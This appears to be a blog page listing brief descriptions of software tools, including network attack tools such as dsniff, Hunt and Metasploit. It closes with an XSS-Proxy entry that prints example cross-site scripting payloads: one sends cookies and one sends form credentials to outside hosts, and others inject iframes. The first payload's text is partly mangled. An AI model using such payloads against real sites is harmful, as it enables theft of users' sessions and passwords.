twit88.com

strobe is a network/security tool that locates and describes all listening tcp ports on a (remote) host or on many hosts in a bandwidth utilisation maximising, and process resource minimizing manner. strobe approximates a parallel finite state machine internally. In non-linear multi-host mode it attempts to apportion bandwidth and sockets amoung the hosts very efficiently. This can reap appreciable gains in speed for multiple distinct hosts/routes. On a machine with a reasonable number of sockets, strobe is fast enough to port scan entire Internet sub domains. It is even possible to survey an entire small country in a reasonable time from a fast machine on the network backbone, provided the machine in question uses dynamic socket allocation or has had its static socket allocation increased very appreciably (check your kernel options). In this very limited application strobe is said to be faster than ISS2.1 (a high quality commercial security scanner by [email protected] and friends) or PingWare (also commercial). (from rpm description)

Popularity: 1% [?]

Achievo is a flexible web-based resource management tool for business environments. Achievo’s resource management capabilities will enable organisations to support their business processes in a simple, but effective manner.

Project Management – This part includes management of projects, phases, tasks, notes, statistics, planning, members en project templates.

Time Registration – The time-registration part is the part where employees can register time on project/phase/activity combinations.

Scheduler – Achievo’s scheduler enables users to share a schedule with the other users.

20 Languages – Achievo’s core is available in about 20 languages.

Popularity: 1% [?]

KNIME, pronounced [naim], is a modular data exploration platform that enables the user to visually create data flows (often referred to as pipelines), selectively execute some or all analysis steps, and later investigate the results through interactive views on data and models.

KNIME was developed (and will continue to be expanded) by the Chair for Bioinformatics and Information Mining at the University of Konstanz, Germany. The group headed by Michael Berthold also uses KNIME for teaching and research at the University. Quite a number of new data analysis methods developed at the chair are integrated in KNIME. Let us know if you are looking for something in particular, not all of those modules are part of the standard KNIME release just yet…

The KNIME base version already incorporates over 100 processing nodes for data I/O, preprocessing and cleansing, modeling, analysis and data mining as well as various interactive views, such as scatter plots, parallel coordinates and others. It integrates all analysis modules of the well known Weka data mining environment and additional plugins allow R-scripts to be run, offering access to a vast library of statistical routines.

KNIME is based on the Eclipse platform and, through its modular API, easily extensible. When desired, custom nodes and types can be implemented in KNIME within hours thus extending KNIME to comprehend and provide first-tier support for highly domain-specific data. This modularity and extensibility permits KNIME to be employed in commercial production environments as well as teaching and research prototyping settings. If you would like to read a more detailed description of the software, please download the attached White Paper.

KNIME is released under a dual licensing scheme. The open source license (GPL) allows KNIME to be downloaded, distributed, and used freely. See license arrangements for complete details.

Popularity: 1% [?]

Go is a new systems programming language from Google.

The goal of the project, as quoted below

No major systems language has emerged in over a decade, but over that time the computing landscape has changed tremendously. There are several trends:

• Computers are enormously quicker but software development is not faster.
• Dependency management is a big part of software development today but the “header files” of languages in the C tradition are antithetical to clean dependency analysis—and fast compilation.
• There is a growing rebellion against cumbersome type systems like those of Java and C++, pushing people towards dynamically typed languages such as Python and JavaScript.
• Some fundamental concepts such as garbage collection and parallel computation are not well supported by popular systems languages.
• The emergence of multicore computers has generated worry and confusion.

We believe it’s worth trying again with a new language, a concurrent, garbage-collected language with fast compilation. Regarding the points above:

• It is possible to compile a large Go program in a few seconds on a single computer.
• Go provides a model for software construction that makes dependency analysis easy and avoids much of the overhead of C-style include files and libraries.
• Go’s type system has no hierarchy, so no time is spent defining the relationships between types. Also, although Go has static types the language attempts to make types feel lighter weight than in typical OO languages.
• Go is fully garbage-collected and provides fundamental support for concurrent execution and communication.
• By its design, Go proposes an approach for the construction of system software on multicore machines.

Popularity: 1% [?]

PowerCommands is a set of useful extensions for the Visual Studio adding additional functionality to various areas of the IDE. The source code is included and requires the VS SDK for VS 2008 to allow modification of functionality or as a reference to create additional custom PowerCommand extensions.

Enable/Disable PowerCommands in Options dialog
This feature allows you to select which commands to enable in the Visual Studio IDE. Point to the Tools menu, then click Options. Expand the PowerCommands options, then click Commands. Check the commands you would like to enable.
Note: All power commands are initially defaulted Enabled.

Format document on save / Remove and Sort Usings on save
The Format document on save option formats the tabs, spaces, and so on of the document being saved. It is equivalent to pointing to the Edit menu, clicking Advanced, and then clicking Format Document. The Remove and sort usings option removes unused using statements and sorts the remaining using statements in the document being saved.
Note: The Remove and sort usings option is only available for C# documents.
Note: Format document on save and Remove and sort usings both are initially defaulted OFF.

Clear All Panes
This command clears all output panes. It can be executed from the button on the toolbar of the Output window.

Copy Path
This command copies the full path of the currently selected item to the clipboard. It can be executed by right-clicking one of these nodes in the Solution Explorer:
The solution node; A project node; Any project item node; Any folder.

Email CodeSnippet
To email the lines of text you select in the code editor, right-click anywhere in the editor and then click Email CodeSnippet.

Insert Guid Attribute
This command adds a Guid attribute to a selected class. From the code editor, right-click anywhere within the class definition, then click Insert Guid Attribute.

Show All Files
This command shows the hidden files in all projects displayed in the Solution Explorer when the solution node is selected. It enhances the Show All Files button, which normally shows only the hidden files in the selected project node.

Undo Close
This command reopens a closed document , returning the cursor to its last position. To reopen the most recently closed document, point to the Edit menu, then click Undo Close. Alternately, you can use the CtrlShiftZ shortcut.
To reopen any other recently closed document, point to the View menu, click Other Windows, and then click Undo Close Window. The Undo Close window appears, typically next to the Output window. Double-click any document in the list to reopen it.

Collapse Projects
This command collapses a project or projects in the Solution Explorer starting from the root selected node. Collapsing a project can increase the readability of the solution. This command can be executed from three different places: solution, solution folders and project nodes respectively.

Copy Class
This command copies a selected class entire content to the clipboard, renaming the class. This command is normally followed by a Paste Class command, which renames the class to avoid a compilation error. It can be executed from a single project item or a project item with dependent sub items.

Paste Class
This command pastes a class entire content from the clipboard, renaming the class to avoid a compilation error. This command is normally preceded by a Copy Class command. It can be executed from a project or folder node.

Copy References
This command copies a reference or set of references to the clipboard. It can be executed from the references node, a single reference node or set of reference nodes.

Paste References
This command pastes a reference or set of references from the clipboard. It can be executed from different places depending on the type of project. For CSharp projects it can be executed from the references node. For Visual Basic and Website projects it can be executed from the project node.

Copy As Project Reference
This command copies a project as a project reference to the clipboard. It can be executed from a project node.

Edit Project File
This command opens the MSBuild project file for a selected project inside Visual Studio. It combines the existing Unload Project and Edit Project commands.

Open Containing Folder
This command opens a Windows Explorer window pointing to the physical path of a selected item. It can be executed from a project item node

Open Command Prompt
This command opens a Visual Studio command prompt pointing to the physical path of a selected item. It can be executed from four different places: solution, project, folder and project item nodes respectively.

Unload Projects
This command unloads all projects in a solution. This can be useful in MSBuild scenarios when multiple projects are being edited. This command can be executed from the solution node.

Reload Projects
This command reloads all unloaded projects in a solution. It can be executed from the solution node.

Remove and Sort Usings
This command removes and sort using statements for all classes given a project. It is useful, for example, in removing or organizing the using statements generated by a wizard. This command can be executed from a solution node or a single project node.

Extract Constant
This command creates a constant definition statement for a selected text. Extracting a constant effectively names a literal value, which can improve readability. This command can be executed from the code editor by right-clicking selected text.

Clear Recent File List
This command clears the Visual Studio recent file list. The Clear Recent File List command brings up a Clear File dialog which allows any or all recent files to be selected.

Clear Recent Project List
This command clears the Visual Studio recent project list. The Clear Recent Project List command brings up a Clear File dialog which allows any or all recent projects to be selected.

Transform Templates
This command executes a custom tool with associated text templates items. It can be executed from a DSL project node or a DSL folder node.

Close All
This command closes all documents. It can be executed from a document tab.

Popularity: 1% [?]

Here is another Java framework that I am experimenting now..

Play Framework is a Java framework by web developers which makes it easier to build web applications with Java.

The features

Fix the bug and hit reload! Edit your Java files, save, refresh your browser and see the results immediately! No need to compile, deploy or restart the server.

Stateless model Play is a real "Share nothing" system. Ready for REST, it is easily scaled by running multiple instances of the same application on several servers.

Efficient template system A clean template system based on Groovy as an expression language. It provides template inheritence, includes and tags.

Resolve errors quickly When an error occurs, play shows you the source code and the exact line containing the problem. Even in templates.

All you need to create a cool web application Provides integration with Hibernate, OpenID, Memcached… And a plugin system.

Pure Java Code with Java, use any Java library and develop with your preferred IDE. Integrates nicely with eclipse or netbeans.

Really fast Starts fast and runs fast!

Popularity: 2% [?]

dsniff is a collection of tools for network auditing and penetration testing. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.). arpspoof, dnsspoof, and macof facilitate the interception of network traffic normally unavailable to an attacker (e.g, due to layer-2 switching). sshmitm and webmitm implement active monkey-in-the-middle attacks against redirected SSH and HTTPS sessions by exploiting weak bindings in ad-hoc PKI.

Popularity: 1% [?]

AirFart is a wireless tool created to detect wireless devices, calculate their signal strengths, and present them to the user in an easy-to-understand fashion. It is written in C/C++ with a GTK front end. Airfart supports all wireless network cards supported by the linux-wlan-ng Prism2 driver that provide hardware signal strength information in the "raw signal" format (ssi_type 3). Airfart implements a modular n-tier architecture with the data collection at the bottom tier and a graphical user interface at the top.

WifiScanner is a tool that has been designed to discover wireless node (i.e access point and wireless clients). It is distributed under the GPL License.
It work with CISCO® card and prism card with hostap driver or wlan-ng driver, prism54g, Hermes/Orinoco, Atheros, Centrino, …
An IDS system is integrated to detect anomaly like MAC usurpation.

Popularity: 2% [?]

SiteDigger searches Google’s cache to look for vulnerabilities, errors, configuration issues, proprietary information, and interesting security nuggets on web sites.

• The tool requires Google web services API license key. Browse to http://www.google.com/apis/ and follow the instructions to get the license key.
• Provide the license key at the bottom-right box on the tool.
• Enter the domain / sub-domain information. (.mil, nasa.gov, usc.edu, etc).
• Select search categories using signature tab.
• Hit the search button. Use the export results button to view the results in tabular format.

Popularity: 2% [?]

OllyDbg is a 32-bit assembler level analysing debugger for Microsoft^® Windows^®. Emphasis on binary code analysis makes it particularly useful in cases where source is unavailable. OllyDbg is a shareware, but you can download and use it for free. Special highlights are:

• Intuitive user interface, no cryptical commands
• Code analysis – traces registers, recognizes procedures, loops, API calls, switches, tables, constants and strings
• Directly loads and debugs DLLs
  
• Object file scanning – locates routines from object files and libraries
• Allows for user-defined labels, comments and function descriptions
• Understands debugging information in Borland^® format
• Saves patches between sessions, writes them back to executable file and updates fixups
• Open architecture – many third-party plugins are available
  
• No installation – no trash in registry or system directories

• Debugs multithread applications
• Attaches to running programs
• Configurable disassembler, supports both MASM and IDEAL formats
• MMX, 3DNow! and SSE data types and instructions, including Athlon extensions
• Full UNICODE support
• Dynamically recognizes ASCII and UNICODE strings – also in Delphi format!
• Recognizes complex code constructs, like call to jump to procedure
• Decodes calls to more than 1900 standard API and 400 C functions
• Gives context-sensitive help on API functions from external help file
• Sets conditional, logging, memory and hardware breakpoints
• Traces program execution, logs arguments of known functions
• Shows fixups
• Dynamically traces stack frames
• Searches for imprecise commands and masked binary sequences
• Searches whole allocated memory
• Finds references to constant or address range
• Examines and modifies memory, sets breakpoints and pauses program on-the-fly
• Assembles commands into the shortest binary form
• Starts from the floppy disk

Popularity: 2% [?]

Software from the book Geek House, published by Wiley, written by the authors of PC Toys. Project code is for a bar code inventory, security monitoring, a recipe database, a barbeque controller, and a soil moisture driven sprinkler controller.

The code is available at http://sourceforge.net/projects/geekhouse/

Popularity: 1% [?]

Metasploit provides useful information to people who perform penetration testing, IDS signature development, and exploit research. This project was created to provide information on exploit techniques and to create a useful resource for exploit developers and security professionals. The tools and information on this site are provided for legal security research and testing purposes only. Metasploit is an open source project managed by Rapid7.

The Metasploit Framework is a development platform for creating security tools and exploits. The framework is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide. The framework is written in the Ruby programming language and includes components written in C and assembler.

The framework consists of tools, libraries, modules, and user interfaces. The basic function of the framework is a module launcher, allowing the user to configure an exploit module and launch it at a target system. If the exploit succeeds, the payload is executed on the target and the user is provided with a shell to interact with the payload.

Popularity: 2% [?]

Moblin is an open source project focused on building a Linux-based platform optimized for the next generation of mobile devices including Netbooks, Mobile Internet Devices, and In-vehicle infotainment systems.

The Moblin Architecture is designed to support multiple platforms and usage models ranging from Netbooks to Mobile Internet Devices (MID), to various embedded usage models, such as the In Vehicle Infotainment systems. The central piece of the architecture is the common layer we call "Moblin Core", a hardware and usage model independent layer that provides one uniform way to develop such devices. Underneath the Moblin Core sits the Linux kernel and device drivers specific to the hardware platform, and above the Moblin Core are the specific user interface and user interaction model for the target device.

Popularity: 1% [?]

Acceleo is a code generator transforming models into code (MDA approach).

Acceleo is easy to use. It provides "off the shelf" generators (JEE, .Net, Php…) and template editors for Eclipse.

Acceleo is natively integrated with eclipse. It is completely merged with its interface for better efficiency and user experience.

Acceleo provides many features for template editing

• syntax highligthing
• meta-model and scripts based completion
• real time error detection
• real time preview

Acceleo is based on the main industry standards to guarantee high level compatibility, interoperability and durability.

Acceleo is especially compatible with XMI 1.x and XMI 2, ensuring compatiblity with the main UML modelers on the market (RSM, Together, Poseidon, …).

Popularity: 2% [?]

Datasoul  is an open source presentation software to display lyrics and text in churches services.

Datasoul keeps lyrics and display format independently. This means that when you want to change the font format or the background image, you don’t need to change tons of files. Take a look on how easy it is in Datasoul.

Beside the lyrics, Datasoul can also hold the chords for the songs. In this way, once you have selected the songs to next service you can easily retrieve the chords for that songs to print or send to the musicians.

In most churches, usually you need to display some announcements during the services. It’s a baby crying on the nursery or a car wrongly parked, something always happen. Know how Datasoul handles this situations.

Several churches use video cameras to record or transmit live images form the service. Datasoul can integrate in these systems and provide an effective solution for displaying lyrics.

Do you have all your songs in EasyWorship? There is an import tool available that converts it into Datasoul format. Once imported, you can also take your database to another operational system such as Linux or MacOS.

Popularity: 1% [?]

Qmmander is an open source filemanager with splitscreen filehandling like the widely known "Norton Commander" which was likely the force behind the development of all the filemanagers out there with a "Commander" in their names.

Qmmander is written in C++ and uses Qt, a cross-platform application and GUI framework from Nokia.

Popularity: 1% [?]

I just release the Java MMS library. It is a library that can be used to encode or decode MMS message. The encoded MMS can then be sent out using MM1 or MM7 protocol. To use MM1 protocol, you need a GPRS/3G modem or GPRS/3G phone. For MM7, you need a connection to MMSC.

A simple sample is provided to show how to use it together with jWAP to send out MMS using MM1 protocol.

   1: WAPClient wapClient = new WAPClient(wapGatewayHost, wapGatewayPort);

   2: PostRequest request = new PostRequest(servlet);

   3: request.setContentType("application/vnd.wap.mms-message");

   4: request.setRequestBody(encodedMms);

   5:  

   6: System.out.println("Connecting to \"" + wapGatewayHost + "\":" + wapGatewayPort + "...");

   7: wapClient.connect();

   8:  

   9: System.out.println("Sending mms message through \"" + servlet + "\"...");

  10: Response response = wapClient.execute(request);

  11: byte[] binaryMms = response.getResponseBody();

  12: wapClient.disconnect();

  13: try {

  14:     MultimediaMessageDecoder dec = new MultimediaMessageDecoder(binaryMms);

  15:     dec.decodeMessage();

  16:     MultimediaMessage message = dec.getMessage();

  17:  

  18:     System.out.println("Status: " + response.getStatus());

  19:     System.out.println("Status Text: " + response.getStatusText());

  20:  

  21:     if (response.getStatus() == 200) {

  22:         System.out.println("Message id: " + message.getMessageId());

  23:         System.out.println("Message sent!");

  24:     } else {

  25:         System.out.println("Message is not sent");

  26:     }

  27:  

  28: } catch (Exception e) {

  29:     System.out.println(e.getMessage());

  30: }

Popularity: 2% [?]

Google Closure tools help developers to build rich web applications with JavaScript that is both powerful and efficient. The Closure tools include:

A JavaScript optimizer

The Closure Compiler compiles JavaScript into compact, high-performance code. The compiler removes dead code and rewrites and minimizes what’s left so that it downloads and runs quickly. It also also checks syntax, variable references, and types, and warns about common JavaScript pitfalls. These checks and optimizations help you write apps that are less buggy and easier to maintain. You can use the compiler with Closure Inspector, a Firebug extension that makes debugging the obfuscated code almost as easy as debugging the human-readable source.

A comprehensive JavaScript library

The Closure Library is a broad, well-tested, modular, and cross-browser JavaScript library. You can pull just what you need from a large set of reusable UI widgets and controls, and from lower-level utilities for DOM manipulation, server communication, animation, data structures, unit testing, rich-text editing, and more.

The Closure Library is server-agnostic, and is intended for use with the Closure Compiler.

An easy templating system for both Java & JavaScript

Closure Templates simplify the task of dynamically generating HTML. They have a simple syntax that is natural for programmers. In contrast to traditional templating systems, in which you use one big template per page, you can think of Closure Templates as small components that you compose to form your user interface.

Closure Templates are implemented for both JavaScript and Java, so that you can use the same templates on both the server and client side. For the client side, Closure Templates are precompiled into efficient JavaScript.

Popularity: 1% [?]

Hunt is a tool for exploiting well known weaknesses in TCP/IP protocol. Use primarily to hijack connections, but has many other features.

Hunt is a program for intruding into a connection, watching it and resetting it. Hunt operates on Ethernet and is best used for connections which can be watched through it. However, it is possible to do something even for hosts on another segments or hosts that are on switched ports. Hunt doesn’t distinguish between local network connections and connections going to/from Internet. It can handle all connections it sees. Connection hijacking is aimed primarily at the telnet or rlogin traffic but it can be used for another traffic too. Features: connection management (watching, spoofing, detecting, hijacking, resetting), daemons (resetting, arp spoof/relayer daemon, MAC discovery daemon for collecting MAC addresses, sniff daemon for logging TCP traffic), host resolving, packet engine (TCP, UDP, ICMP and ARP traffic; collecting TCP connections with sequence numbers and the ACK storm detection), switched environment (hosts on switched ports can be spoofed, sniffed and hijacked too). This latest release includes lots of debugging and fixes in order to get the hunt running against hosts on switched ports, timejobs, dropping IP fragments, verbose status bar, options, new connection indicator, various fixes.

Popularity: 3% [?]

XSS-Proxy is an advanced Cross-Site-Scripting (XSS) attack tool.

Types of information leakage due to XSS attack

1. Client can reveal cookies to 3rd party (session state, order info, etc)

http://host/a.php?variable="><script>document.location=’http://www.cgisecurity.com/cgi-bin/cookie.cgi?document.location=’http://www.cgisecurity.com/cgi-bin/cookie.cgi">http://host/a.php?variable="><script>document.location=’http://www.cgisecurity.com/cgi-bin/cookie.cgi?
‘%20+document.cookie</script>

2. Client can reveal posted form items to 3rd party (userID/passwd, etc)

<form> action="logoninformation.jsp" method="post" onsubmit="hackImg=new Image; hackImg.src=’http://www.malicioussite.com/’+document.forms(1).login.value’+':’+ document.forms(1).password.value;" </form>

3. Client can be tricked into accessing/posting spoofed info to trusted server

http://www.trustedserver.com/xss.asp?name">www.trustedserver.com/xss.asp?name = <iframe
src=http://www.trustedserver.com/auth_area/orderupdate?items=4000></iframe>

4. Client can be tricked into attacking other sites

/hello.asp?name = <iframe
src=http://vuln.iis.server/scripts/root.exe?/c+dir></iframe>

Popularity: 2% [?]